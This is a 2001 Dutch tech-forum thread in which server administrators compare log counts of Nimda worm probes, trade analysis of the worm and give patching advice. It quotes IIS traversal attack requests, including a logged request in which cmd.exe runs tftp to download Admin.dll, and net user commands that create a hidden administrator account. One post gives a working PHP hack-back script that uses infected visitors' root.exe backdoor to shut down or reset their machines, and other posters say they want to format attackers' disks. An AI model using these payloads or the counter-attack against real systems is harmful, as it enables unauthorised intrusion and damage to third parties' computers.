Toon posts:

Welke worm is dit nu weer?

Pagina: 1 2 Laatste
Acties:
  • 773 views sinds 30-01-2008
  • Reageer

dinsdag 18 september 2001 17:25

Acties:

Verwijderd

Topicstarter
code:
1
2
3

131.211.69.21 - - [18/Sep/2001:17:51:05 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
131.211.69.21 - - [18/Sep/2001:17:51:05 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
131.211.69.21 - - [18/Sep/2001:17:51:05 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308

:?
code:
1
2
3

[rbultje@gizmo logs]$ cat *access | grep cmd.exe | wc -l
     763 
[rbultje@gizmo logs]$

Gaat lekker snel hiero :D

dinsdag 18 september 2001 17:28

Acties:
  • Jordi
  • Registratie: Januari 2000
  • Niet online

Jordi

#1#1

Hmz, ik heb er ook al 340 :? Leuk, die Microsoft webservers :D
Heerlijk innovatief, elke week weer meer worms om je mee te vermaken, ik denk dat ik het toch eens aan ga schaffen :P

Het zal wel niet, maar het zou maar wel.

dinsdag 18 september 2001 17:38

Acties:

Verwijderd

Stukkie uit mij log:


[Mon Sep 17 16:21:19 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/root.exe
[Mon Sep 17 16:21:20 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/MSADC/root.exe
[Mon Sep 17 16:21:20 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/c/winnt/system32/cmd.e
[Mon Sep 17 16:21:20 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/d/winnt/system32/cmd.e
[Mon Sep 17 16:21:21 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/..%5c../winnt/
[Mon Sep 17 16:21:21 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/_vti_bin/..%5c../..%5c
[Mon Sep 17 16:21:21 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/_mem_bin/..%5c../..%5c
[Mon Sep 17 16:21:21 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/msadc/..%5c../..%5c../
[Mon Sep 17 16:21:22 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/..Á\../winnt/s
[Mon Sep 17 16:21:22 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/..À¯../winnt/s
[Mon Sep 17 16:21:22 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/..Á../winnt/s
[Mon Sep 17 16:21:24 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/..%5c../winnt/
[Mon Sep 17 16:21:24 2001] [error] [client 213.168.217.2] File does not exist: /usr/local/httpd/htdocs/scripts/..%2f../winnt/
[Mon Sep 17 16:24:18 2001] [error] [client 213.84.114.46] File does not exist: /usr/local/httpd/htdocs/scripts/root.exe
[Mon Sep 17 16:26:07 2001] [error] [client 213.84.86.66] File does not exist: /usr/local/httpd/htdocs/scripts/root.exe
[Mon Sep 17 16:26:11 2001] [error] [client 213.84.86.66] File does not exist: /usr/local/httpd/htdocs/MSADC/root.exe
[Mon Sep 17 16:26:16 2001] [error] [client 213.84.86.66] File does not exist: /usr/local/httpd/htdocs/c/winnt/system32/cmd.ex
[Mon Sep 17 16:26:20 2001] [error] [client 213.84.86.66] File does not exist: /usr/local/httpd/htdocs/d/winnt/system32/cmd.ex
[Mon Sep 17 16:33:22 2001] [error] [client 213.84.124.143] File does not exist: /usr/local/httpd/htdocs/scripts/root.exe
[Mon Sep 17 16:33:31 2001] [error] [client 213.84.124.143] File does not exist: /usr/local/httpd/htdocs/MSADC/root.exe
[Mon Sep 17 16:33:41 2001] [error] [client 213.84.124.143] File does not exist: /usr/local/httpd/htdocs/c/winnt/system32/cmd.
[Mon Sep 17 16:33:51 2001] [error] [client 213.84.124.143] File does not exist: /usr/local/httpd/htdocs/d/winnt/system32/cmd.
[Mon Sep 17 16:34:01 2001] [error] [client 213.84.124.143] File does not exist: /usr/local/httpd/htdocs/scripts/..%5c../winnt
[Mon Sep 17 16:34:11 2001] [error] [client 213.84.124.143] File does not exist: /usr/local/httpd/htdocs/_vti_bin/..%5c..

dinsdag 18 september 2001 17:38

Acties:
  • Jordi
  • Registratie: Januari 2000
  • Niet online

Jordi

#1#1

386 inmiddels... share the fun :)

Het zal wel niet, maar het zou maar wel.

dinsdag 18 september 2001 17:41

Acties:

Verwijderd

d'r staat een hele verdachte admin.dll met de datum van vandaag in de C root van die 1e post maar krijg dat klere ding niet te pakken grmbl..

dinsdag 18 september 2001 17:47

Acties:
  • wouzer
  • Registratie: Maart 2000
  • Niet online

wouzer

Goh, wat zou deze nu weer doen?

dinsdag 18 september 2001 17:47

Acties:

Verwijderd

Okay hebbes van een andere site ;) ff loeren wat 't kreng doet.

dinsdag 18 september 2001 17:51

Acties:

Verwijderd

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

Op het eerste gezicht mailed het wat. het klooit wat in je tcp settings het lijkt een user te adden of guest ofzo te enablen. boeiend stukje code opzich...

dinsdag 18 september 2001 17:55

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

* flat start PuTTY

cat access_log | grep cmd.exe | wc -l
164

hmmm
ff m'n codered-script ombouwen... weer leuke stats!

edit:

ehm... die exploit is volgens mij al erg oud hoor (voor de vakantie) of was dat een andere?


[edit 2]
http://flat.wox.org/nimda.php
na 't eten maar eventjes een filter inbouwen dat elke host er maar één keertje inkomt ofzo... dit schiet niet echt op zo
[/edit 2]

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 17:59

Acties:

Verwijderd

code:
1
2
3
4

net user guest /add
net user guest /active
net localgroup Guests guest /add
net localgroup Administrators guest /add

Hmmz zeer boeiend stukje code, zegt iemand de term gapend security hole wat? >:)

dinsdag 18 september 2001 17:59

Acties:
  • pinball
  • Registratie: Oktober 1999
  • Niet online

pinball

Electric Monk

pinball@dimple:~$ grep cmd.exe /var/log/apache/access_log | wc -l
193


http://www.cert.org/current/current_activity.html#port80

Whenever you find that you are on the side of the majority, it is time to reform.

dinsdag 18 september 2001 18:02

Acties:

Verwijderd

lol kep er ook al veel, dit aan tal is maar van 1 logfile

boeffie:/var/log/apache# cat apache.access_log | grep winnt | wc -l
259

dinsdag 18 september 2001 18:14

Acties:
  • moto-moi
  • Registratie: Juli 2001
  • Laatst online: 09-06-2011

moto-moi

Ja, ik haat jou ook :w

Zie ook :

http://slashdot.org/article.pl?sid=01/09/18/151203&mode=thread

God, root, what is difference? | Talga Vassternich | IBM zuigt

dinsdag 18 september 2001 18:16

Acties:

Verwijderd

Topicstarter
van de NLLGG mailintlijst:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

Bij mij op de kabel ligt de frequentie ook veel hoger. Eerste IP-nummer is
210.53.23.201, wat een chinees is. Daarna 203.239.140.250, dat is Korea
met op z'n homepage de tekst: 

                fuck USA Government

                     fuck PoizonBOx

                 contact:sysadmcn@yahoo.com.cn

...168.169.92.251 
...213.82.202.70 
...210.242.219.15 weer met bovenstaande tekst.

enz. Blijkbaar lukt het deze worm soms om de homepage van de server te
veranderen...?

dinsdag 18 september 2001 18:19

Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 18:14 schreef moto-moi het volgende:
Zie ook :

http://slashdot.org/article.pl?sid=01/09/18/151203&mode=thread
Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!
:D Het is ook elke week weer lachen met MS :D

[edit]
readme.eml is een binary :( - kan iemand wijs worden uit de binary?

dinsdag 18 september 2001 18:25

Acties:

Verwijderd

Hmzzz, /me zit ook al aan de 758.



Jajaja, ben populair bij het crackersgilde blijkbaar :D

(disclaimer: Dit is geen uitnodiging ;) )

dinsdag 18 september 2001 18:28

Acties:

Verwijderd

Maar ja dit veroorzaakt dus onnodig veel dataverkeer, dus door microsoft rotzooi word mijn verbinding weer trager

dinsdag 18 september 2001 18:30

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

Even een kort overzicht van wat ik tot nu toe heb gevonden:
- worm exploit een aantal bekende exploits in IIS
- worm probeert zich via shares te verspreiden
- worm voegt een stukje HTML onder de default-webpage toe die een 'readme.eml' file (hijzelf) laat downloaden. Wegens een bug in IE5 wordt deze automagisch ge-opend
- worm mailt zich via het adresboek naar iedereen toe
- worm maakt een user 'Guest' aan, deze heeft geen pwd en is local admin, verder wordt de C-disk geshared

Lekker explosief .. :P

Een hele dump van de .eml file (die ik van een ge-infecteerde machine heb gedownload) staat op:
http://www.verelst.net/worm.txt

There are no stupid questions, but there are a lot of inquisitive idiots.

dinsdag 18 september 2001 18:30

Acties:
  • 0siris
  • Registratie: Augustus 2000
  • Laatst online: 03-05 15:44

0siris

Op dinsdag 18 september 2001 18:28 schreef kia het volgende:
Maar ja dit veroorzaakt dus onnodig veel dataverkeer, dus door microsoft rotzooi word mijn verbinding weer trager
let's sue their ass!

ach...in een volgend leven lach je er om!

dinsdag 18 september 2001 18:34

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

Op dinsdag 18 september 2001 18:30 schreef Wizard_of_OS het volgende:
Een hele dump van de .eml file (die ik van een ge-infecteerde machine heb gedownload) staat op:
http://www.verelst.net/worm.txt
LOL ik kwam die vanmiddag tegen op een paar pubs... maar niet gedownload
vroeg me wel af waar 't op sloeg

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 18:48

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

Op dinsdag 18 september 2001 18:16 schreef beelzebubu het volgende:
van de NLLGG mailintlijst:
code:
1
2
3
4
5
6
7
8
9

Bij mij op de kabel ligt de frequentie ook veel hoger. Eerste IP-nummer is
210.53.23.201, wat een chinees is. Daarna 203.239.140.250, dat is Korea
met op z'n homepage de tekst: 
[knip]
...168.169.92.251 
...213.82.202.70 
...210.242.219.15 weer met bovenstaande tekst.
enz. Blijkbaar lukt het deze worm soms om de homepage van de server te
veranderen...?
Nee, deze machines waren blijkbaar al door een andere worm geinfecteerd, het 'mooie' van de huidige worm is dat de bestaande pagina blijft bestaan maar dat IE5 gebruikers een .eml file in hun maag gesplitst krijgen :'(

There are no stupid questions, but there are a lot of inquisitive idiots.

dinsdag 18 september 2001 18:49

Acties:
  • jep
  • Registratie: November 2000
  • Laatst online: 05-05 11:28

jep

anoniempje:/var/log/httpd>cat * | grep cmd.exe | wc -l
14566
anoniempje:/var/log/httpd>

En die lui maar denken dat ik aan NT doe :D

dinsdag 18 september 2001 18:49

Acties:

Verwijderd

code:
1

cat access_log | grep winnt | wc -l

579

Jeuj ! *D

dinsdag 18 september 2001 18:51

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

De worm is trouwens even itelligent als de voorgaande (CodeRed II) lijkt het: ik krijg vrijwel alleen connecties van machines in hetzelfde /16 netwerk (universiteit utrecht). Ik heb maar een mailtje naar de netwerkbeheerders gestuurd ... happy patching :-/

There are no stupid questions, but there are a lot of inquisitive idiots.

dinsdag 18 september 2001 18:52

Acties:

Verwijderd

Op dinsdag 18 september 2001 18:48 schreef Wizard_of_OS het volgende:

[..]

Nee, deze machines waren blijkbaar al door een andere worm geinfecteerd, het 'mooie' van de huidige worm is dat de bestaande pagina blijft bestaan maar dat IE5 gebruikers een .eml file in hun maag gesplitst krijgen :'(
Als je het mij vraagt, heeft deze worm een aardig potentieel om half internet open te zetten.

/me surft rustig verder onder Linux >:)

dinsdag 18 september 2001 19:08

Acties:
  • RG
  • Registratie: Augustus 2000
  • Laatst online: 28-11-2025

RG

Lambda

Is dit niet een heel oude bug die al in IIS 3.0 zat? Flat is dit niet dezelfde bug die jij bij ons op school had ontdekt??
However ik heb er 380. Ik wordt strontziek van deze onzin. Door code red was internet op een gegeven moment niet meer vooruit te krijgen :( Er zijn zoveel mensen die thuis Windows 2000 of NT server hebben draaien en er geen ene bal verstand van hebben dus blijkbaar :(

[deze advertentieruimte is te koop]

dinsdag 18 september 2001 19:15

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

Op dinsdag 18 september 2001 19:08 schreef Groot-Moefti het volgende:
Is dit niet een heel oude bug die al in IIS 3.0 zat? Flat is dit niet dezelfde bug die jij bij ons op school had ontdekt??
However ik heb er 380. Ik wordt strontziek van deze onzin. Door code red was internet op een gegeven moment niet meer vooruit te krijgen :( Er zijn zoveel mensen die thuis Windows 2000 of NT server hebben draaien en er geen ene bal verstand van hebben dus blijkbaar :(
onder andere ja...
ik word hier echt gek van... soms 8 probes/seconde door één host... ik zit al op 296 nu :(

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 19:23

Acties:

Verwijderd

dit heet: unicode bug

dinsdag 18 september 2001 19:26

Acties:

Verwijderd

Op dinsdag 18 september 2001 19:15 schreef Flat© het volgende:
onder andere ja...
ik word hier echt gek van... soms 8 probes/seconde door één host... ik zit al op 296 nu :(
Ik kan me niet zo druk maken om de probes die richting mijn IP'tje gestuurd worden.
Die paar bytes voor een HTTP-request zijn verwaarloosbaar klein.

Alleen als dit net zo hard gaat verspreiden (waarschijnlijjk wel) als Code Red, dan ga je het wel merken in internet snelheid :(

dinsdag 18 september 2001 19:30

Acties:

Verwijderd

edit: bij nader inzien toch niet ontopic (Outlook security bug)

dinsdag 18 september 2001 19:31

Acties:
  • zork
  • Registratie: September 2000
  • Laatst online: 21-04 14:40

zork

Op dinsdag 18 september 2001 17:59 schreef Yarvieh het volgende:
code:
1
2
3
4

net user guest /add
net user guest /active
net localgroup Guests guest /add
net localgroup Administrators guest /add

Hmmz zeer boeiend stukje code, zegt iemand de term gapend security hole wat? >:)
Uhm... Jah *D

dinsdag 18 september 2001 19:33

Acties:
  • Mark
  • Registratie: Juni 1999
  • Laatst online: 05-05 21:45

Mark

Date: Tue, 18 Sep 2001 10:00:37 -0600 (MDT)
From: Marc Fossi <mfossi@securityfocus.com>
To: Focus-MS <focus-ms@securityfocus.com>
Subject: New Worm Named W32/Minda.a@mm

W32/Minda.a@mm is the working name for it.

Marc Fossi, MCSE
SecurityFocus
www.securityfocus.com
Het heeft al een naam ;)
code:
1
2

root@alpha:/opt/itxl/logs# cat trafic.log | grep winnt | wc -l
   8729

dinsdag 18 september 2001 19:37

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

Op dinsdag 18 september 2001 19:26 schreef nelske het volgende:
Ik kan me niet zo druk maken om de probes die richting mijn IP'tje gestuurd worden.
Die paar bytes voor een HTTP-request zijn verwaarloosbaar klein.
ja, maar mijn servertje (zie signature) trekt 't bijna niet om die logfiles weg te schrijven :+

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 19:38

Acties:
  • paragon
  • Registratie: April 2000
  • Laatst online: 07:39

paragon

Hoe kom je er eigenlijk achter waar een ip vandaan komt.

dinsdag 18 september 2001 19:38

Acties:

Verwijderd

Topicstarter
Geweldig....

Nu al 1350, vanmiddag (2 1/2 uur geleden) nog 750....

Leve MS! :D |:(

dinsdag 18 september 2001 19:38

Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 19:38 schreef paragon het volgende:
Hoe kom je er eigenlijk achter waar een ip vandaan komt.
Staat in je logfiles :)

dinsdag 18 september 2001 19:41

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

ja 't gaat echt hard met deze worm
zo'n 100 attacks per uur hiero

paragon> je kan ook nog een hostname-lookup doen... staat leuk in je stats

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 19:41

Acties:
  • paragon
  • Registratie: April 2000
  • Laatst online: 07:39

paragon

Op dinsdag 18 september 2001 19:38 schreef beelzebubu het volgende:

[..]

Staat in je logfiles :)
Nee, dat weet ik maar ik bedoel waar het ip vandaan komt welk land?

dinsdag 18 september 2001 19:42

Acties:
  • moto-moi
  • Registratie: Juli 2001
  • Laatst online: 09-06-2011

moto-moi

Ja, ik haat jou ook :w

Op dinsdag 18 september 2001 19:38 schreef paragon het volgende:
Hoe kom je er eigenlijk achter waar een ip vandaan komt.
whois <ipadres>

God, root, what is difference? | Talga Vassternich | IBM zuigt

dinsdag 18 september 2001 19:46

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

aan de hostname kan je 't vaak ook wel zien

zo komt
cp11xxxx-a.dbsch1.nb.nl.home.com uit Den Bosch, maar dat komt omdat @home die hostnames zo uitdeelt
en
cliente-xxx.firstmark.es komt uit spanje

sim-pel

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 19:56

Acties:

Verwijderd

Op dinsdag 18 september 2001 19:37 schreef Flat© het volgende:
[..]
ja, maar mijn servertje (zie signature) trekt 't bijna niet om die logfiles weg te schrijven :+
ROFLOL :D

Tja dan zet je logging toch gewoon uit :+

dinsdag 18 september 2001 21:30

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

Op dinsdag 18 september 2001 19:56 schreef nelske het volgende:

[..]

ROFLOL :D

Tja dan zet je logging toch gewoon uit :+
tja maar dan heb ik niet van deze leuke stats

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 21:38

Acties:
  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 09:04

Ramon

oke :)

nu ik :)

zette net m'n webservertjes aan. Kreeg meteen tiny personal firewall die kwam zeiken over een outgoing connection van Trivial FTP. Dit bleef maar doorgaan, geblokt en webservertjes uitgezet.

Maar dit is dus echt wel irritant. Hij weet gewoon CMD.EXE te starten en daarna ook nog gewoon een FTP client die gewoon naar alle IP's in mijn subnet wilde connecten.
code:
1

2001-09-18 18:59:30 213.10.48.170 - 213.10.64.32 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20213.10.48.170%20GET%20Admin.dll%20e:\Admin.dll 502 -

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/

dinsdag 18 september 2001 21:41

Acties:

Verwijderd

Tja wat zeuren we dan ;)
Zonder wormen zouden er geen mensen leuke php-stats scripts maken :P

Er staat inmiddels ook iets op de frontpage:
http://www.tweakers.net/nieuws/18500

dinsdag 18 september 2001 21:45

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

Op dinsdag 18 september 2001 21:38 schreef Tampie2000 het volgende:
oke :)

nu ik :)

zette net m'n webservertjes aan. Kreeg meteen tiny personal firewall die kwam zeiken over een outgoing connection van Trivial FTP. Dit bleef maar doorgaan, geblokt en webservertjes uitgezet.
Outgoing TFTP? Dan ben je al geinfecteerd!

Dat wordt windows opnieuw installeren, of wachten tot dat helemaal bekend is wat die worm voor schade aanricht, zodat iemand een cleanup-tool kan maken.

There are no stupid questions, but there are a lot of inquisitive idiots.

dinsdag 18 september 2001 21:48

Acties:

Verwijderd

Op dinsdag 18 september 2001 21:38 schreef Tampie2000 het volgende:
oke :)

nu ik :)

zette net m'n webservertjes aan. Kreeg meteen tiny personal firewall die kwam zeiken over een outgoing connection van Trivial FTP. Dit bleef maar doorgaan, geblokt en webservertjes uitgezet.

Maar dit is dus echt wel irritant. Hij weet gewoon CMD.EXE te starten en daarna ook nog gewoon een FTP client die gewoon naar alle IP's in mijn subnet wilde connecten.
code:
1

2001-09-18 18:59:30 213.10.48.170 - 213.10.64.32 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+tftp%20-i%20213.10.48.170%20GET%20Admin.dll%20e:\Admin.dll 502 -
Tja wat wil je nu dat ik zeg.
Er zijn al lang patches voor deze exploits te verkrijgen!!
Zorg gewoon dat je systeem in orde is.

dinsdag 18 september 2001 21:51

Acties:
  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 09:04

Ramon

Op dinsdag 18 september 2001 21:48 schreef nelske het volgende:

[..]

Tja wat wil je nu dat ik zeg.
Er zijn al lang patches voor deze exploits te verkrijgen!!
Zorg gewoon dat je systeem in orde is.
Je mag zeggen wat je wil :)

Ik draai SP2 en ik heb de fix voor code red :)

ik ben ook geen echte admin ofzo hoor mocht je dat denken :)

dus ook geen wanabe :)

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/

dinsdag 18 september 2001 21:54

Acties:
  • Johannes Verelst
  • Registratie: Februari 2001
  • Laatst online: 14-11-2022

Johannes Verelst

Op dinsdag 18 september 2001 21:51 schreef Tampie2000 het volgende:

[..]

Je mag zeggen wat je wil :)

Ik draai SP2 en ik heb de fix voor code red :)

ik ben ook geen echte admin ofzo hoor mocht je dat denken :)

dus ook geen wanabe :)
Als je geen admin bent, waarom draai je dan een server OS? Of leren hoe je een bak moet bijhouden, of alle internet-servers de-installeren, maar niet allebei (dat is precies de reden waarom CodeRed zo veel succes had)
Maak van die :) maar een :(

There are no stupid questions, but there are a lot of inquisitive idiots.

dinsdag 18 september 2001 21:56

Acties:
  • balk
  • Registratie: Januari 2000
  • Laatst online: 13:43

balk

haha, ik zit op 1162 :)

dinsdag 18 september 2001 21:57

Acties:
  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 09:04

Ramon

Op dinsdag 18 september 2001 21:54 schreef Wizard_of_OS het volgende:

[..]

Als je geen admin bent, waarom draai je dan een server OS? Of leren hoe je een bak moet bijhouden, of alle internet-servers de-installeren, maar niet allebei (dat is precies de reden waarom CodeRed zo veel succes had)
Maak van die :) maar een :(
:? :?
Mag ik niet gewoon een beetje met ASP experimenteren ofzo?

en waarom zou ik :( zijn?

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/

dinsdag 18 september 2001 22:03

Acties:

Verwijderd

Topicstarter
Nou.....

Kijk......

Als ik per minuut enkele scans krijg, dan gaat mijn connectie toch wel vrij snel dichtslibben.... Filevorming heet dat in V&W-termen.

Dus ik zou eigenlijk het recht moeten hebben alle geinfecteerde servers die mij (ongevraagd) scannen te benaderen op bovengenoemde url (cmd.exe), zo de admin shell te krijgen en ze te formatteren :(

Maar nee, dan ben ik de lul en moet ik de cel weer in :r

dinsdag 18 september 2001 22:03

Acties:
  • Rob
  • Registratie: Februari 2000
  • Niet online

Rob

Op dinsdag 18 september 2001 21:57 schreef Tampie2000 het volgende:

[..]

:? :?
Mag ik niet gewoon een beetje met ASP experimenteren ofzo?
lokaal wel ja, maar hang 'm niet meteen aan het internet
en waarom zou ik :( zijn?
Omdat je je machine eens flink mag opruimen omdat hij waarschijnlijk nu flink onder hande is genomen door de worm.

In the beginning the Internet was a bunch of smart users with dumb terminals. Now...

dinsdag 18 september 2001 22:05

Acties:
  • LuCarD
  • Registratie: Januari 2000
  • Niet online

LuCarD

Certified BUFH

Grrr..... weer zoon irritant virus.......

misschien wat leuke code.....
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<?
echo "<h2>Shutting down of IIS/WIN2K systems infected with CODE RED/Nimba</h2><br /><br /><br /><br />if your system is not infected this page will do no harm to your system.<br /><br />This script also notify's the owner his pc has been infected before it reboots.";   
 if (getenv(HTTP_X_FORWARDED_FOR))
 { 
    $ip = getenv(HTTP_X_FORWARDED_FOR); 
       } else {   
        $ip = getenv(REMOTE_ADDR);    }
@file('http://'.$ip.'/scripts/root.exe?%2Fc+net+send+%25computername%25+This+machine+has+the+NIMBA+or+CODE+RED+II+worm%2C+please+shut+down+immediately+and+then+take+appropriate+measures%21%20See%20http%3A%2F%2Fvil.mcafee.com%2FdispVirus.asp%3Fvirus_k%3D99177%26');
@file('http://'.$ip.'/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5');
@file('http://'.$ip.'/scripts/root.exe?/c+iisreset+/stop') ;
@file('http://'.$ip.'/scripts/root.exe?/c+iisreset') ;
@file('http://'.$ip.'/scripts/../../winnt/system32/cmd.exe/c+iisreset+/stop');
@file('http://'.$ip.'/scripts/../../winnt/system32/cmd.exe/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5');
show_source("root.exe");
?>

Zet deze in de scripts dir met de naam root.exe....

voeg aan je .htaccess file toe
AddType application/x-httpd-php .exe

en klaar is }:O

LET OP: DIT IS DUS NIET LEGAAL OM TE GEBRUIKEN, HET IS ALLEEN VOOR INFORMATIE DOELEINDEN... etc etc etc..

Programmer - an organism that turns coffee into software.

dinsdag 18 september 2001 22:05

Acties:
  • Ramon
  • Registratie: Juli 2000
  • Laatst online: 09:04

Ramon

Op dinsdag 18 september 2001 22:03 schreef -Rob- het volgende:

[..]

lokaal wel ja, maar hang 'm niet meteen aan het internet
[..]

Omdat je je machine eens flink mag opruimen omdat hij waarschijnlijk nu flink onder hande is genomen door de worm.
onder handen genomen als in? :? Hij stond net 1 minuut aan....

Check mijn V&A ads: https://tweakers.net/aanbod/user/9258/

dinsdag 18 september 2001 22:08

Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 22:05 schreef LuCarD het volgende:
Grrr..... weer zoon irritant virus.......

misschien wat leuke code.....

Zet deze in de scripts dir met de naam root.exe....

voeg aan je .htaccess file toe
AddType application/x-httpd-php .exe

en klaar is }:O

LET OP: DIT IS DUS NIET LEGAAL OM TE GEBRUIKEN, HET IS ALLEEN VOOR INFORMATIE DOELEINDEN... etc etc etc..
Ziet er geweldig uit })

Maar... :(

Mijn apache ondersteunt volgens mij geen PHP :(

Kun je dat in perl schrijven?

dinsdag 18 september 2001 22:11

Acties:
  • flat
  • Registratie: Mei 2000
  • Niet online

flat

Op dinsdag 18 september 2001 21:56 schreef balk het volgende:
haha, ik zit op 1162 :)
damn... ik nog maar op de 553 :P

"Happiness is a way of travel, not a destination."
--Roy Goodman

dinsdag 18 september 2001 22:13

Acties:
  • Rob
  • Registratie: Februari 2000
  • Niet online

Rob

Op dinsdag 18 september 2001 22:05 schreef Tampie2000 het volgende:

[..]

onder handen genomen als in? :? Hij stond net 1 minuut aan....
Hij zet wat op je HD
Hij shared wat schijven
Hij verandert wat in je register
...
Dat is zo'n beetje bekend nu

In the beginning the Internet was a bunch of smart users with dumb terminals. Now...

dinsdag 18 september 2001 22:30

Acties:

Verwijderd

Het zal het Nimda virus wel zijn. Staat een stukje te lezen op : http://www.securityfocus.com/headlines/12545
Lijkt een heel vies virus te zijn.

dinsdag 18 september 2001 22:31

Acties:
  • balk
  • Registratie: Januari 2000
  • Laatst online: 13:43

balk

Op dinsdag 18 september 2001 22:11 schreef Flat© het volgende:

[..]

damn... ik nog maar op de 553 :P
Heel veel 130.161.enz...... Voor de mensen op de TU Delft, die weten wel wat dat betekent. Al die studenten aansluitingen staan roodgloeiend :)

trouwens 1241 nu.... :Z

dinsdag 18 september 2001 22:32

Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 22:30 schreef janjanjanjanjansen het volgende:
Lijkt een heel vies virus te zijn.
Dat heet een exploit die gebruik maakt van een hele vieze beveiligingslek in zowel IE :r als IIS :r van MS :r

dinsdag 18 september 2001 22:33

Acties:
  • moto-moi
  • Registratie: Juli 2001
  • Laatst online: 09-06-2011

moto-moi

Ja, ik haat jou ook :w

Op dinsdag 18 september 2001 22:03 schreef beelzebubu het volgende:
Maar nee, dan ben ik de lul en moet ik de cel weer in :r
Weer ? Vertel eens, is er iets wat je 'vergeten' bent in je profile te zetten ? ;-))

God, root, what is difference? | Talga Vassternich | IBM zuigt

dinsdag 18 september 2001 22:35

Acties:

Verwijderd

Topicstarter
Op dinsdag 18 september 2001 22:33 schreef moto-moi het volgende:

[..]

Weer ? Vertel eens, is er iets wat je 'vergeten' bent in je profile te zetten ? ;-))
nee hoor....

Maar ik zie teveel crackers/skr1ptk1dd13s in de cel verdwijnen of [{geld}{taak}]straffen krijgen en daar heb ik geen zin in... Ik zou echter dolgraag alle computers die mij scannen een format c: willen geven :+

dinsdag 18 september 2001 22:50

Acties:

Verwijderd

Op dinsdag 18 september 2001 21:30 schreef Flat© het volgende:

[..]

tja maar dan heb ik niet van deze leuke stats
COOL :9

dinsdag 18 september 2001 22:58

Acties:
  • s3n
  • Registratie: Juli 2000
  • Laatst online: 15:00

s3n

Op dinsdag 18 september 2001 21:30 schreef Flat© het volgende:

[..]

tja maar dan heb ik niet van deze leuke stats
Is er ook al zo'n leuk scriptje voor windows-iis ?

dinsdag 18 september 2001 23:09

Acties:
  • Jordi
  • Registratie: Januari 2000
  • Niet online

Jordi

#1#1

Gheh, gaat lekker zo. Heb er inmiddels alweer ruim 5x zoveel als vanmiddag :D

Het zal wel niet, maar het zou maar wel.

dinsdag 18 september 2001 23:14

Acties:

Verwijderd

Hihi,

Zit nu een kleine 30 min. online via ISDN en heb inmiddels al zo'n 63 pogingen binnen.
Uit oa:

Polen
Duitsland
Italie
Nederland
.il (vraag me ff niet welk land het is :? )

Ben ik ff blij dat ik ipchains helemaal paranoide heb ge-configged :7

-----
Nu: 00:40 uur is de couter al weer opgelopen naar zo'n 247.
Nasty virusje :(
Dat gaat morgen weer een hoop media opeveren :+

dinsdag 18 september 2001 23:20

Acties:
  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

Godzijdank draai ik geen IIS hier en op het werk, maar ik zie de donkere bui al hangen.

Je kunt er donder op zeggen dat elke breedband ISP nu echt op servers gaat controleren, tenkoste van diegenen die wel verantwoord werken (lees: geen IIS draaien, of zelfs geen MS OS).

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device

dinsdag 18 september 2001 23:31

